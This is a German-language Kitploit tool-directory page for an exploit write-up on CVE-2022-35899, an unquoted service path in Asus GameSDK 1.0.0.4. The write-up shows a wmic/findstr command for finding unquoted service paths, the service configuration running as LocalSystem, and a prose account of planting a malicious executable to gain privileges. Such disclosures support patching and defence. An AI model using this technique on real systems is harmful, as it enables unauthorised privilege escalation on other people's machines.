Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-35899 — Nicht in Anführungszeichen gesetzter Dienstpfad Asus GameSdk | Kitploit
Tools/GitHubGitHub/angelopioamirante/cve-2022-35899
Privilege EscalationSchwachstellenanalyseExploitationFehlkonfiguration
GitHubangelopioamirante/cve-2022-35899

CVE-2022-35899

Nicht in Anführungszeichen gesetzter Dienstpfad Asus GameSdk

Repository anzeigen
3vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-35899

Nicht in Anführungszeichen gesetzter Dienstpfad Asus GameSdk

Exploit-Titel: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Nicht in Anführungszeichen gesetzter Dienstpfad (Privilegieneskalation)

Datum: 07/14/2022

Exploit-Autor: Angelo Pio Amirante

Version: 1.0.0.4

Getestet auf: Windows 10

Gepatchte Version: 1.0.5.0

Schritt zum Ermitteln des nicht in Anführungszeichen gesetzten Dienstpfads:

root@kitploit:~
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Informationen zum Dienst:

root@kitploit:~
C:\>sc qc "GameSDK Service"

[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: GameSDK Service
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : GameSDK Service
        DIPENDENZE                :
        SERVICE_START_NAME : LocalSystem

Exploit

Wenn ein Angreifer das System bereits kompromittiert hat und der aktuelle Benutzer über die Berechtigungen verfügt, in den Ordner "C:\Program Files (x86)\ASUS" oder in "C:" zu schreiben, könnte er seine eigenen Dateien "Program.exe" oder "GameSDK.exe" ablegen. Wenn der Dienst startet, würde er die schädliche Datei anstelle der originalen "GameSDK.exe" starten.

Auswirkung

Ein Angreifer kann seine Privilegien auf dem System erhöhen.

POC-Video

https://youtu.be/u_8JMIgn-5g

Tool herunterladen